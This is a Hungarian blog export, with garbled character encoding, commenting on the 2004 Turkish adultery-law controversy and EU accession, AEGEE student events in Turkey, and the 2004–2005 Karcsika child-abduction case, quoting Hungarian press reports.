Becslיsek szerint ugyanis minden צtצdik fיrfinak egynיl tצbb felesיge van - igaz, az esketיs csak vallבsi keretek kצzצtt bonyolףdhat, a hit ugyanis tolerבlja a 4 felesיget, mםg a tצrצk jog nem. </div><div align="justify"><br /></div><div align="justify">A tצrצk miniszterelnצk-jelצlteknek viszont nem kell ajבnlaniuk, hogy a dolgozף cserיlje 60 יves felesיgיt 3 hתszיvesre.</div><div align="justify"><br /></div><div align="justify"><span style="color:#ff0000;">szept. 15.</span></div><div align="justify"></div><div align="justify"></div><div align="justify"><span style="font-size:130%;color:#ff0000;">Bűn a hűtlensיg Ankarבban?<br /></span>Nיpszabadsבg</div><div align="justify">Sz. E., 2004. szeptember 15. 00:00</div><div align="justify"><br /><br />Nagyon valףszםnűtlennek tartja egy neve elhallgatבsבt kיrő tצrצk politikus, hogy a kormבny vיgl a parlament elי viszi a hבzassבgtצrיs bntetיsיről szףlף javaslatבt - jelentette a CNN. Az Eurףpai Uniף בltal hevesen bםrבlt javaslat יrtelmיben a tצrצk bntető tצrvיnykצnyvbe visszakerlt volna a hבzassבgtצrיs. Ezt a mףdosםtבst azonban csak a kormבnyzף Igazsבg יs Fejlődיs Pבrtja (AKP) tבmogatta. Az MTI szerint Deniz Baykal, a tצrצk parlamenti ellenzיk vezיre mבr kצzצlte is: a kormבny nem terjeszti be a parlament elי a sok vitבt kivבltף tervezetet.</div><div align="justify"><br />Ankarai forrבsunk a Nיpszabadsבgnak elmondta: a tצrצk parlament rendkםvli lיsszakra lt צssze kedden, hogy a kצvetkező kיt hיtben megvitassבk az תj bntető tצrvיnykצnyv tervezetיt. Nyolcvan יv ףta ez lenne az első mףdosםtבs Tצrצkorszבgban, יs cיlja, hogy elvיgezze a tצrצk jog harmonizבciףjבt az uniףs joghoz. Ezt a tצrekvיst elhomבlyosםtotta a hבzassבgtצrיs kriminalizבlבsבra tett javaslat miatti felhבborodבs. A tiltakozף nőszervezetek keddre hirdettek tntetיst az ankarai parlament elי. Forrבsunk szerint, bבr a hבzassבgtצrיst illetően elmיleti esיlyegyenlősיg lenne - hiszen a tצrvיny a fיrfiakra is vonatkozna -, a nőszervezetek בllםtjבk: a tצrצk tבrsadalom nagy rיszיben nem olyanok a viszonyok, hogy egy nő a fיrjיvel szemben bםrףsבghoz fordulhasson.</div><div align="justify"><br />Az Eurףpai Bizottsבg oktףber 6-בn adja ki Tצrצkorszבgrףl szףlף orszבgjelentיsיt, melynek alapjבn az EU vezetői decemberben dצntenek arrףl, megkezdődjenek-e Ankarבval a csatlakozבsi tבrgyalבsok. ֽgy a tצrצkצknek fontos, hogy a jogharmonizבciף addig elinduljon. Az EU vezetői tצbbszצr figyelmeztettיk a tצrצk politikusokat: a hבzassבgtצrיsről szףlף javaslat hבtrבltathatja az EU-csatlakozבst.</div><div align="justify"><br />A Reuters בltal megkיrdezett iszlבm jogi szakיrtők szerint felmerl a kיrdיs, a tצrצk kormבny miיrt akarta egyבltalבn visszaבllםtani a hבzassבgtצrיs megbntetיsיt, mikor ez nyilvבnvalףan vitבkra ad okot Brsszellel. Tצrצkorszבgban ugyanis az alkotmבnybםrףsבg 1996-ban a fיrfiak, 1998-ban pedig a nők esetיben is hatבlyon kםvl helyezte a hבzassבgtצrיsre vonatkozף bntetőjogi passzusokat. Elemzők szerint a szיlsősיges muzulmבn gyצkerekre יpםtkező kormבnypבrt konzervatםv vבlasztףi kedvייrt bejelentette ugyan a hבzassבgtצrיs bntetיsיről szףlף kiegיszםtיst, de vיgigvinni mבr nem akarja.</div><div align="justify"><br /></div><div align="justify"><span style="color:#ff0000;">Efendi kommentבrja</span> a cikkhez: A jogharmonizבciף nem most indul - igen komoly eredmיnyek szlettek mבr az elmתlt hבrom יvben e tיren, a jogalkalmazבs is folyik - sצyle-bצyle -, klצnben aligha lehetne december 17-יn dצnteni arrףl, hogy megkezdje-e az Uniף a csatlakozבsi tבrgyalבsokat Tצrצkorszבggal.</div><div align="justify"><br /></div><div align="justify"></div><div align="justify">Aki tud nיmetl, mיg olvasgasson <a href="http://www.sueddeutsche.de/ausland/artikel/19/38980/">itt</a> meg <a href="http://www.sueddeutsche.de/ausland/artikel/26/38987/">itt</a> meg <a href="http://www.sueddeutsche.de/ausland/artikel/254/39215/">itt</a> meg mיg (főleg) <a href="http://www.sueddeutsche.de/ausland/artikel/241/39202/">itt</a> is.</div><div align="justify"><br /></div><div align="justify"><span style="color:#ff0000;">szept.18.</span></div><div align="justify">Kitצrt a kבosz. A Miniszterelnצk megיrkezett klfצldről, kiderlt, hogy mיgsem vonjבk vissza az indםtvבnyt a hבzassבgtצrיs BTK-ba foglalבsבrףl. Az ellenzיk rבreplt a lehetősיgre, s ellentmondott, םgy aztבn a kormבnypבrt visszavonta a parlamentben az egיsz BTK-t, a rendkםvli parlamenti lיsszakot berekesztettיk, 18-בn a kיpviselők elmentek szabadsבgra okt. 1-ig, a rendes lיszak kezdetיig, elfelejtve, hogy a BTK elfogadבsa cיljבbףl jצttek צssze. Az Eurףpai Bizottsבg bejelentette: az okt. 6-i tצrצk orszבgjelentיst eddig annak tudatבban םrtak, hogy lesz תj BTK. Ha mיgsem lesz, akkor a tבrgyalבsokat nem kezdik meg Tצrצkorszבggal. Hogy a hבzassבgtצrיssel kapcsolatos passzust kיsצbb se lehessen becsempיszni a BTK-ba, arrףl majd a bizottsבgi monitoring gondoskodik. Miniszterelnצk szerint az Uniף ne beszיljen bele az egיszbe, "mi Tצrצkorszבg vagyunk", "nem akarunk mindenבron EU-tag lenni". Vagyis, van יlet az Uniףn kםvl is (ez mבr ismerősen cseng a magyar fleknek).</div><div align="justify"><br /></div><div align="justify">Kבosz a kormבnypבrtban, ףriבsi tצrצk presztםzsvesztesיg Eurףpבban, a tovבbbi fejlemיnyek a tצrצk-uniףs kapcsolatokban pedig a tצrצkצk szבmבra siralmas irבnyt vehetnek. Mi יrtelme volt az egיsznek? Semmi. ֽgy kell napok alatt mindent elszתrni. Aki szerint pedig a mai tצrצkorszבgi בllapotok olyanok, hogy a tצrצk felesיgek bntetőbםrףsבghoz fordulhatnak יs beperelhetik a fיrjket hבzassבgtצrיs miatt, az srgősen jףzanodjon ki יs kezdje תjra a gondolkodבst. </div><div align="justify"><br /></div><div align="justify"></div><div align="justify">Nagyjבbףl most lehet kezdeni bתcsתt venni a csatlakozבsi tבrgyalבsok időpontjבnak kitűzיsיtől a december 17-i Eurףpai Tanבcson. </div><div align="justify"><br /></div><div align="justify">Link:</div><div align="justify"><a href="http://edition.cnn.com/2004/WORLD/europe/09/20/turkey.eu.adultery.reut/index.html">EU: No Turkey talks without reform</a></div><div align="justify"><a href="http://www.magyarhirlap.hu/cikk.php?cikk=88314">Ankara vesztיsre בll Brsszelben</a> MH, aug. 22.</div><div align="justify"><br /></div><div align="justify"><span style="color:#ff0000;">szept. 23.</span></div><div align="justify">A tצrצk miniszterelnצk brsszeli uniףs megbeszיlיsein megoldotta a sajבt maga בltal kreבlt problיmבt: e hיt vיgיn צsszel a parlament יs elfogadja a bntető tצrvיnykצnyvet, a hבzassבgtצrיs pedig mיgsem kerl be a BTK-ba. Eurףpa parlamenti vezető צnmיrsיkletre szףlםtotta fel a tצrצk kormבnyt יs az Eurףpai Bizottsבgot is, mondvבn, vannak sokkal sתlyosabb tצrצkorszבgi problיmבk, mint a mostani gy, pl. a kurd יs mבs kisebbsיgek helyzete. </div><div align="justify"><br /></div><div align="justify">Az elmתlt hבrom hיt tanulsבga: nem jף zlet az, amelynek eredmיnyekיnt tצbbet veszםtnk, mint amennyit nyernk. A tצrצk kormבnyfő demokratikus elkצtelezettsיgיn szeplő esett, politikai ellenfelei azon בllםtבsבnak, hogy a kormבnypבrtnak iszlamista hבtsף gondolatai vannak, ezutבn Eurףpבban is nagyobb hitelt adnak. Szףval, kבr volt akciףzni. Mבris itt az תj kיrdיs Eurףpבban: Tצrצkorszבg tagsבgot akar ugyan az Eurףpai Uniףban, de vajon a dצntיshozףk יs a tבrsadalom kיsz-e elfogadni a kצzצs eurףpai יrtיkeket? Amםg ez eldől, ajבnlom olvasבsra <a href="http://www.turkishdailynews.com/old_editions/09_21_04/burak.HTM">Burak Bekdil םrבsבt, Erdogan Erdogan ellen.</a></div><div align="justify"><br /></div><div align="justify">Mivel most mבr tיnyleg vבrhatף, hogy a tצrצk parlament elfogadja a BTK-t, a tצrצk uniףs csatlakozבssal kapcsolatos kommentבrjaimat ezutבn a <a href="http://torokorszag.blogspot.com/2004/05/trkorszg-az-eurpai-uniban.html">"Tצrצkorszבg az Eurףpai Uniףban?" </a>postban םrom, s itt "csak" a tצrצk nők tבrsadalmi helyzetיvel kapcsolatos fejlemיnyek ismertetיsיre szorםtkozom.</div><div align="justify"></div><div align="justify"></div><div align="justify"><br /></div><div align="justify"><span style="color:#ff0000;">szept. 26.</span> A tצrצk parlament elfogadta az תj BTK-t, 2005. בprilis 1-től lesz hatבlyos.Ez jobb, mint ahogy eddig kinיzett, ugyanis korבbban csak 2 יv mתlva lיpett volna a BTK hatבlyba. Hבzassבgtצrיsi passzus nincs benne. A kצrnyezetszennyezיssel kapcsolatos bntetיsek csak 2 יv mתlva lesznek alkalmazhatףk, azt mondjבk, ha azonnal hatבlyba lיpne, akkor az צsszes polgבrmestre mehetne a bצrtצnbe. Pl. az צnkormבnyzatok 60 %-ban nincs szennyvםztisztםtבs, minden megy a tengerbe vagy a termיszetbe. Az יrdekesebb rיszletekre visszatיrek, vagy itt, vagy az EU-poston. </div><div align="justify"><br /></div><div align="justify">A tצrצk nők civil szervezetei szerint a BTK nem rossz, <a href="http://www.bianet.org/2004/09/01_eng/news44113.htm">35 kםvבnsבgukbףl 30 szerepel benne. </a>Ez tיnyleg nem kedvezőtlen arבny.</div><div align="justify"></div><div align="justify"><a href="http://www.bianet.org/2005/01/01_eng/news52124.htm"><strong>2004 was Good for Women, 2005 will Be Better</strong></a> - BIA , 2005. januבr 5.</div></div> -false - - - - - -Efendi - -2004-09-01T21:29:00+02:00 -2005-02-28T11:37:29Z -2004-09-01T19:37:06Z - -tag:blogger.com,1999:blog-7074887.post-109406742661893386 -AEGEE tצrצkorszבgi programjai -<div align="center"><strong><em><span style="font-size:130%;color:#ff0000;">2005.</span></em></strong></div><div align="center"><strong><em><span style="font-size:130%;color:#ff0000;"></span></em></strong><br /></div><div align="center"><strong><em><span style="font-size:130%;color:#ff0000;"></span></em></strong></div><div align="justify"><strong><em><span style="color:#000000;">AUTUMN AGORA 2005, okt. 20-23. - AEGEE-Izmir, rיszletek <a href="http://www.aegee-izmir.org/html/">ITT</a></span></em></strong></div><div align="justify"><strong><em></em></strong><br /></div><div align="justify"><strong><em><span style="color:#000000;"></span></em></strong></div><div align="justify"><strong><em><span style="color:#000000;">EUROPEAN SCHOOL 2 ANKARA, </span></em></strong><strong><em><span style="color:#000000;">Advanced European Leadership Training, szept. 5-12. - AEGEE-Ankara, <a href="http://www.karl.aegee.org/calendar.nsf/EventuallyEdi/C512268F3B8DBD4CC1256F87007584A2?OpenDocument">LINK ITT</a></span></em></strong></div><div align="justify"><strong><em></em></strong><br /></div><div align="justify"><strong><em><span style="color:#000000;"></span></em></strong></div><div align="justify"><strong><em><span style="color:#000000;">TROY YOUTH FESTIVAL 2 & BALKANIA RM SPRING '05, בpr. 6-10. - AEGEE-Canakkale, <a href="http://aegee.comu.edu.tr/troyfest.html">LINK ITT</a></span></em></strong></div><div align="justify"><strong><em></em></strong><br /></div><div align="justify"><strong><em><span style="color:#000000;"></span></em></strong></div><div align="justify"><strong><em><span style="color:#000000;">CULTURAL COLOURS - FOLKLORE AND FOLK DANCES, mבrc. 14-17. - AEGEE-Tekirdag (Rodostף), rיszletek <a href="http://www.aegee-tekirdag.com/">ITT</a></span></em></strong></div><div align="justify"><strong><em></em></strong><br /></div><div align="justify"><strong><em><span style="color:#000000;"></span></em></strong></div><div align="justify"><strong><em><span style="color:#000000;">Winter University, mבrc. 12-16. - AEGEE-Erzurum rיszletek <a href="http://www.karl.aegee.org/calendar.nsf/EventuallyEdi/32B9A5B818F770D7C1256F81004D769A?OpenDocument">ITT</a></span></em></strong></div><div align="justify"><strong><em></em></strong><br /></div><div align="justify"><strong><em></em></strong></div><div align="justify"><strong><em>Winter University, mבrc. 7-13. - AEGEE-Kayseri (Kappadףkia), rיszletek <a href="http://www.aegee-kayseri.org/wu4.html">EZEN A LINKEN</a></em></strong></div><div align="justify"> <br /></div><div align="justify"></div><div align="justify"><strong><em></em></strong></div><div align="justify"><strong><em>AZ ײSSZES AEGEE-EUROPE PROGRAM <a href="http://www.karl.aegee.org/calendar.nsf/EventuallyEdi?OpenView&Count=500">ITT</a> LֱTHAT׃</em></strong></div><div align="justify"><strong><em>----------------------------------</em></strong></div><div align="justify"><strong><em></em></strong></div><div align="center"><strong><em><span style="font-size:130%;color:#ff0000;">2004.</span></em></strong></div><div align="center"><br /></div><div align="justify"><strong><em></em></strong></div><div align="justify"><strong><em>2004. okt. 30.: Az AEGEE tבjיkoztatףja arrףl, hogyan sikerlt az "Eurףpa יs az iszlבm" יs a "Tצrצkorszבg יs az EU" konferencia:</em></strong></div><div align="justify"><br /></div><div align="justify">30.10.2004 - AEGEE Press Release on the Euroislam Project and the EU and Europe Project events in Turkey</div><div align="justify"><br /></div><div align="justify"><strong>Islam &amp; Europe - students dig up common ground</strong><br /></div><div align="justify"><br />In the month of October the European Students Forum AEGEE organised in Turkey two remarkable events. First, at the beginning of the month, students of all faiths and none gathered in Ankara for a conference to build understanding between the European and Muslim worlds. Then, on the 21-24th of October, in Izmir, they gathered in a discussion over Turkey and its EU accession chances, opportunities and threats.</div><div align="justify"><br />The <strong>"Islam and Europe: Eye Contact"</strong> conference took place in the Middle East Technical University. Speakers including Prof. Dr. John Esposito, Dr. Henner Frtig, Assist. Dr. Peter Mandaville, Ibrahim Al-Marashi and Ajmal Masroor provoked the students to heated debate, and led them to honest and open eye contact. The 60 participants were hosted by AEGEE-Ankara (the European Students' Forum in Ankara), with the support of Council of Europe, the European Commission, the Secretariat General for EU Affairs and the Ministry of Culture and Tourism.</div><div align="justify"><br /></div><div align="justify">Over six intensive days, the students outlined their common values, and set out a range of projects for building dialogue and understanding between their communities. Students of all faiths and none gathered in Ankara last week for a conference to build understanding between the European and Muslim worlds. Over six intensive days, the students outlined their common values, and set out a range of projects for building dialogue and understanding between their communities. In the process, whilst identifying NGO partners for these projects, the participants built new friendships across the cultural divide and overcame some of their own prejudices. Proposals included: further dialogue on women and the Hijab, on the compatibility of Muslim and European identity, and on Turkey's accession to the EU; media projects to reach a wider audience and overcome popular prejudices; work with the socially excluded in both communities; the developement of an NGO network to cooperate on these and other projects. Professor John Esposito warned the students "to compare real with real, ideal with ideal," and not to compare the best of their own culture with the worst of the other. At the end of the conference, Mahmoud Youness of Lebanon remarked, "I personally would live with this group forever. If we can createthis atmosphere among ourselves, the world can do the same."</div><div align="justify"><br /></div><div align="justify">The highlight of the <strong>"EU and Turkey"</strong> Conference in Izmir was the students-performed simulation of the Council of Europe November meeting, having to decide on the Turkish candidature to the European Union. Simulations are one of AEGEE's main learning-by-doing approach tools, allowing students to involve in valuable debates on the current issues of the main importance to the societies we live in. </div><div align="justify"><br /></div><div align="justify"><strong>Mi az AEGEE?</strong></div><div align="justify"><br /></div><div align="justify">AEGEE is one of Europe's largest interdisciplinary and voluntary student associations, operating without being linked to any political party, promoting a unified Europe, cross-border co-operation, communication and integration in academic environment, and at the same time striving to create an open and tolerant society by involving students and young graduates in valuable projects and discussions over the topics of importance for the communities they live in. It is represented in 260 university cities, in 42 countries all around Europe and has about 17000 members.</div><div align="justify"><br /></div><div align="justify">More information:Ewa Solarczyk</div><div align="justify">Vice-President / Director for Public Relations</div><div align="justify"><br /></div><div align="justify">European Students' Forum - AEGEE</div><div align="justify">Rue Nestor de Tiere 151030 Bruxelles</div><div align="justify">Phone: +32 2 245 23 00</div><div align="justify">Fax: +32 2 245 62 60</div><div align="justify">Web: <a href="http://www.aegee.org">www.aegee.org</a></div><div align="justify">Email: <a href="mailto:ewa.solarczyk@aegee.org">ewa.solarczyk@aegee.org</a></div><div align="justify"></div><div align="justify">------------------------------------------------------------------------------------------------</div><div align="justify"><br /></div><div align="justify"><a href="http://www.aegee-ankara.org/eyecontact/">AEGEE-Ankara: "Eurףpa יs az iszlבm" konferencia</a> 2004. oktףber 1-6. kצzצtt. Jelentkezni lehet <span style="color:#ff0000;">szeptember 10</span>-ig.<br /><br /></div><div align="justify">Az AEGEE-Izmir יs az International Politics WG "Tצrצkorszבg יs az EU" c. konferenciבja oktףber 21-24. kצzצtt lesz Izmirben. A jelentkezיsi hatבridő mבr lejבrt. Info: <a href="http://www.karl.aegee.org/calendar.nsf/ID/IPW0410TUR4">link</a></div><div align="justify"><br /></div><div align="justify">AEGEE-Trabzon: </div><div align="justify"><a href="http://www.aegee.uni-karlsruhe.de/fect/?req=pagetrabzon">FIND EUROPE - Trabzoni fesztivבl, 2004. oktףber 4-9.</a> Jelentkezni lehet <span style="color:#ff0000;">szeptember 4</span>-ig.</div><div align="justify">Trabzon kivבlף hely! Magyar testvיrvבrosa: Szigetvבr.</div> -false - - - - -Efendi - -2004-08-30T10:24:00+02:00 -2005-05-20T10:19:17Z -2004-08-30T08:28:19Z - -tag:blogger.com,1999:blog-7074887.post-109385449902022618 -jabb magyar gyermekrablבs Tצrצkorszבgban -<p align="justify"></p><span style="font-size:130%;"><span style="font-size:100%;"><p align="center"> <br /><strong>"Szemיlyesen jבrok utבna a dolognak" </strong></p><p align="center"><strong>Magyarorszבg a tצrצk csatlakozבs mellett</strong></p><p align="center"><strong><span style="font-size:85%;">Magyar Hםrlap, 2005. mבjus 12.</span></strong></p><p align="center"><strong><span style="font-size:85%;">Sztankףczy Andrבs<br /></span></p></strong><p align="justify"><br />Magyarorszבg tבmogatja Tצrצkorszבg uniףs csatlakozבsבt, Tצrצkorszבg pedig visszaadja Mehmet Karcsikבt. S kצzben a magyar–tצrצk gazdasבgi kapcsolatok is szבrnyalni kezdenek. Nagyjבbףl ezt a forgatףkצnyvet vבzolta fel a tצrצk יs a magyar kormבnyfő a tegnapi budapesti tבrgyalבsok utבn.</span></p><p align="justify"><span style="font-size:100%;">"Szemיlyesen jבrok utבna a dolognak" – םgיrte meg Recep Tayyip Erdogan, aki azt mondta, hogy mבr eddig is tettek lיpיseket Tysz Mehmet Kבroly felkutatבsבra. </span></p><p align="justify"><span style="font-size:100%;">Az, hogy tettek lיpיseket, nem תjdonsבg, ugyanezt mondta tavaly ősszel a tצrצk klgyminiszter is, בm a nyolcיves gyerek azףta sem kerlt elő, ami persze abbףl a szempontbףl nem meglepő, hogy pיldבul a horvבt rendőrצk is bבrhogy igyekeznek, nem talבljבk Ante Gotovinבt, pedig Horvבtorszבg sokkal kisebb, mint Tצrצkorszבg, Gotovina pedig sokkal nagyobb, mint Karcsika. </span></p><p align="justify"><span style="font-size:100%;">A magyar בllampolgבrsבgת fiתt tavaly rabolta el tצrצk יdesapja magyar יdesanyjבtףl, s a nemzetkצzi egyezmיnyek יrtelmיben a tצrצk hatףsבgoknak fel kellene kutatniuk יs vissza kellene adniuk יdesanyjבnak a fiתt. </span></p><p align="justify"><span style="font-size:100%;">Bבr mindkיt politikus hangsתlyozta, hogy a kapcsolatok kivבlףak (ami igaz is), azיrt nem Karcsika az egyetlen gond. Pיldבul Magyarorszבg szerint jף volna, ha vיgre magyar marha kerlhetne a tצrצk tבnyיrokra, בm a tצrצk hatףsבgoknak ezt eddig egיszsיggyi előםrבsokra hivatkozva sikerlt megakadבlyozniuk. Ankara viszont azt nehezmיnyezi, hogy a magyar tranzitvםzum csak 48 ףra, mםg a tצrצk 15 nap, ahelyett, hogy צrlne annak, hogy Tצrצkorszבg ennyivel nagyobb. </span></p><p align="justify"><span style="font-size:100%;">Van nיmi elsimםtandף problיma a tengerhajףzבssal kapcsolatban is, mבr תgy יrtem azon kםvl is, hogy neknk nincs tengernk. A tצrצkצk azt is szeretnיk, ha kצnnyebben kapnבnak vםzumot, יs a magyar kormבnyfő םgיrt is klצnleges eljבrבst zletembereknek. Erre azיrt is szksיg volna, mert az eddigi magyarorszבgi tצrצk befektetיsek az alig יrzיkelhető kategףriבba tartoznak. Az alacsony kiindulףpont az egyik titka annak is, hogy a gazdasבgi-kereskedelmi kapcsolatok szבzalיkban mיrve roppant lבtvבnyos gyarapodבsnak indultak. Pedig a tבvlatok tיnyleg nagyok, hiszen a tצrצk gazdasבg fejlődיse elkיpesztő. </span></p><p align="justify"><span style="font-size:100%;">Vannak terletek, ahol a tצrצk fejlődיs nem ennyire nyaktצrő. "Az צrmיny nיpirtבs gye nem szerepelt יs nem is szerepelhet a csatlakozבsi feltיtelek kצzצtt" – mondta Erdogan. Illetve egיszen pontosan a tצrצk nyelvתjםtבs nיpszerű termיkיnek szבmםtף "תgynevezett צrmיny nיpirtבs" fordulatot hasznבlta. Ankara szerint ugyanis a mבsfיl milliף halott צrmיny a tצrtיnelem első vבrosi legendבja, csak sokkal sikeresebben terjesztik, mint pיldבul azt, amely szerint a Mol azיrt יpםt kutakat Erdיlyben, hogy a magyar harckocsik majd tudjanak hol tankolni. A tצrצk kormבnyfő megismיtelte javaslatבt, hogy az ggyel inkבbb foglalkozzanak a tצrtיnיszek יs a levיltבrosok. A kormבnyfőnek lבthatףan klצnצsen rosszul esett, hogy egyes parlamentek elםtיlik az צrmיny nיpirtבst (mבrmint az תgynevezettet): "ֹn is fצlבllhatok, hogy םtיljenek el valamit egy mבsik orszבgban. Mindenki םtיlje el a sajבt nיpirtבsבt!"– adta ki a jelszףt. A gond csak az, hogy a vilבg jelentős rיsze pont ezt vבrja Tצrצkorszבgtףl. </span></p><p align="justify"><span style="font-size:100%;">"Tצrצkorszבg szבmםthat rבnk"– nyugtatott meg minden tצrצkצt egy kיrdיsre vבlaszolva Gyurcsבny Ferenc, jelezve, hogy Magyarorszבg, csakתgy, mint eddig, a jצvőben is tבmogatja a tצrצk csatlakozבst. Gyurcsבny egy felmיrיsre is hivatkozott, amely szerint a magyarok kיtharmada tבmogatja, hogy Tצrצkorszבg az Eurףpai Uniף tagja legyen. "A jצvőben is kצzצs lehet a tצrtיnelem" – cיlzott a magyar kormבnyfő biztatףan a kצzצs uniףs tagsבgra, יs mindketten elmerengtek a kצzצs mתlt legszorosabb fejezetein, amelyeknיl a kצzצs jצvő azיrt remיlhetőleg rףzsבsabb lesz. </span></p><p align="justify"><span style="font-size:100%;"><strong>2005. mבjus 6.</strong> </span></p><p align="justify"><span style="font-size:100%;"><strong>Efendi kommentבrja:</strong></span></p><p align="justify"><span style="font-size:85%;">A tצrצk hatףsבgok nem akarjבk megtalבlni Karcsikבt. </span></p><p align="justify"><span style="font-size:85%;">A tצrצkצk korבbbi בllםtבsai ellenיre - lבsd lent a hםrekben - Karcsika apja mיgis Tצrצkorszבgban van. Vajon miיrt mondtבk mבrciusig, hogy nincs ott?</span></p><p align="justify"><span style="font-size:85%;">Minden hםresztelיssel ellentיtben van nemzetkצzi elfogatףparancs Karcsika apja ellen, januבr eleje ףta (mבs kיrdיs, hogy ki lehetett volna-e adni azt korבbban). Nemzetkצzi kצrצzיst pedig tavaly jתlius vיgיn adtak ki Magyarorszבgon. </span></p><p align="justify"><span style="font-size:85%;">Karcsika apjבt ezיrt a tצrצk rendőrsיg ki is hallgatta (ha mבr egyszer Tצrצkorszבgban van). Mit בllםt? Hogy a kisfiת vםgan יl az anyjבnבl, Magyarorszבgon. Jף a vבlasz, el is engedik.</span></p><p align="justify"><span style="font-size:85%;">Itt megבllt a tudomבny. </span></p><p align="justify"><span style="font-size:85%;">A tצrצk jog nem szankcionבlja a gyermek jogellenes klfצldre vitelיt. Karcsika apja ellen - aki amתgy magyar בllampolgבr is - ma sem bntető-, sem polgבri peres eljבrבs nem folyik Tצrצkorszבgban.</span></p><p align="justify"><span style="font-size:85%;">Ahogy mבr korבbban is םrtam, a gyermekek jogellenes klfצldre vitelיnek polgבri jogi vonatkozבsairףl szףlף hבgai egyezmיnyt a gyermek visszaadבsa cיljבbףl egy יven bell lehet alkalmazni (vagyis jתlius 11-ig). Utבna majd a tצrצk csalבdjogi bםrףsבg תgy dצnt, hogy a gyermek helye az apjבnבl van. </span></p><p align="justify"><span style="font-size:85%;">Nem volnיk meglepve, ha Karcsikבt mבr anyakצnyveztיk volna Tצrצkorszבgban. A tצrצk בllampolgבrsבgi tצrvיny szerint tצrצk szlő gyermeke automatikusan tצrצk בllampolgבr.</span></p><p align="justify"><span style="font-size:85%;">Itt tartunk. </span></p><p align="justify"><span style="font-size:85%;">Raskף Szofi apja is bntetlenl megתszta a gyermekrablבst Tצrצkorszבgban, Nיmetorszבgban יs Magyarorszבgon is. Sőt, azףta mבr tצbbszצr jבrt Magyarorszבgon.</span></p><p align="center"><span style="font-size:85%;"><strong>Tovבbbra sincs nyoma a Tצrצkorszבgba hurcolt magyar kisfiתnak<br />Elfogtבk Karcsika יdesapjבt<br />Blikk, 2005. mבrcius 18.</strong></span></p><p align="justify"><span style="font-size:85%;"><em>Szeged - Megtalבlta יs elfogta Isztambulban a tצrצk rendőrsיg a mבr 8 hףnapja elrabolt יs nyomtalanul eltűnt magyar kisfiת, Mehmet Karcsika (8) יdesapjבt - יrteslt a Blikk.</em> </span></p><p align="justify"><span style="font-size:85%;">Pבr nappal ezelőtt majdnem sikerlt a csoda az isztambuli nyomozףknak: a nemzetkצzi replőtיren elfogtבk a mבr 8 hףnapja elrabolt Mehmet Karcsika tצrצk יdesapjבt, Mehmet Tyszt. gy tudjuk, a fיrfi יpp Nיmetorszבgba akart utazni. Vele volt kיt 10 יv kצrli kisfiת יs egy kislבny, valamint kיt hצlgy, amikor elfogtבk.<br /><br />A fיrfi - mivel nemzetkצzi elfogatףparancsot adtak ki ellene a magyarorszבgi szervek okmבnyhamisםtבs miatt - elmיletileg sehova sem utazhat. A tצrצk rendőrצk ezיrt őrizetbe vettיk Karcsika apjבt, majd 24 ףra mתlva kiengedtיk. Megkerestk a tצrצk rendőrsיget is, ahol nem kםvבntak nyilatkozni. Egy nיvtelensיgיt kיrő tצrצk rendőrtiszt azonban a Blikk kיrdיsיre elבrulta: a gyerekek szemיlyazonossבgבt nem ellenőriztיk, םgy elkיpzelhető, hogy az egyik fiת Karcsika volt. </span></p><p align="justify"><span style="font-size:85%;">Mint a Blikk tצbbszצr is megםrta: tavaly Karcsikבt (8) egy hamis תtlevיllel יdesapja elrabolta. A mama hiבba tett feljelentיst a rendőrsיgen, a hatףsבgok azt hittיk, a szegedi kisfiת csak elkףborolt. Nem sokkal kיsőbb azonban kiderlt, hogy egy 6 fős banda segיdletיvel יs hamis papםrokkal Isztambulba vittיk a gyereket. A magyar hatףsבgok csak hosszas levelezgetיsek יs vitבk utבn rendeltיk el az apa יs a fiתcska nemzetkצzi kצrצzיsיt. </span></p><p align="justify"><span style="font-size:85%;">Az isztambuli konzul, dr. Odavecz ֱkos kצzצlte: a csalבd beleegyezיse nיlkl nem mondhat semmit az gyről. Az יdesanya, Papp Edina tudott az apa őrizetbe vיtelיről, de azt lapunktףl tudta meg, hogy kisfia is ott lehetett a replőtיren. - risten, biztos, hogy Karcsika volt az - zokogta el magבt a mama. - Egyszerűen nem fיr a fejembe, hogy a gyermekemet miיrt engedtיk el. A csalבd jogi kיpviselője, dr. Rבcz Roland kצzצlte, jבrt bent a minisztיriumban, ahol kiderlt, idיn januבrban csak a tצrצkorszבgi Interpol Irodבnak lett megkldve Karcsika, illetve apjבnak a nemzetkצzi kצrצzיse. Ez pedig azיrt baj, mert a tצrצk rendőrsיg יs gyיszsיg erről nem kapott hivatalos יrtesםtיst csak most, miutבn felhםvtam az Igazsבggy Minisztיrium illetיkeseinek a figyelmיt erre. A minisztיrium sajtףosztבlyבnak munkatבrsa, Tamבs Eszter elmondta: kedden kaptak יrtesםtיst a tצrצk tבrsminisztיriumtףl, hogy a papa megvan, de Karcsikבrףl semmi hםr. - Azt a tבjיkoztatבst kaptuk, hogy a gyermek Magyarorszבgon, az יdesanyjבnבl van - tette hozzב a sajtףs.</span></p><span style="font-size:85%;"></span><p align="center"><br /><strong>Bבrsony Andrבs talבlkozףja Tצrצkorszבg תj budapesti nagykצvetיvel</strong></p><p align="center"><strong><span style="font-size:85%;">2005. februבr 17.</span></strong></p><strong><p align="justify"><br /></strong></span><span style="font-size:100%;">Kצzצs magyar יs tצrצk יrdek, hogy minיl gyorsabban le lehessen zבrni Mehmet Karcsika gyיt” – hangsתlyozta Bבrsony Andrבs, a Klgyminisztיrium politikai בllamtitkבra, amikor fogadta Tצrצkorszבg תj budapesti nagykצvetיt.</span></p><p align="justify"><span style="font-size:100%;">A beszיlgetיsen, amelyen בttekintettיk a kיt orszבg egyttműkצdיsיnek kיrdיseit, a klgyi vezető ismיtelten felhםvta a figyelmet Tysz Mehmet Kבroly gyיre, akit tצrצk יdesapja az יdesanya beleegyezיse nיlkl mיg tavaly nyבron vitt illegבlisan klfצldre. Bבrsony hangsתlyozta: magyar megםtיlיs szerint a tצrצk rendőrsיg nem tesz meg minden tőle telhetőt a gyermek tartףzkodבsi helyיnek felkutatבsa יrdekיben. Bבrsony Andrבs jelezte, kצzצs יrdek elkerlni, hogy az gy kבrosan hasson az egyיbkיnt sokoldalת יs kivבlףan fejlődő magyar-tצrצk kapcsolatokra.</span></p><p align="justify"><span style="font-size:100%;">A nagykצvet, Umur Apaydin haladיktalan יs hatיkony intיzkedיst םgיrt. Remיnyיt fejezte ki, hogy az gyben rצvid időn bell kedvező fordulat בll be.</span></p><p align="justify"><span style="font-size:100%;">Tysz Mehmet Kבroly gyיben a Női- יs Gyermekjogi Kutatף יs Oktatף Kצzpont szerdבn 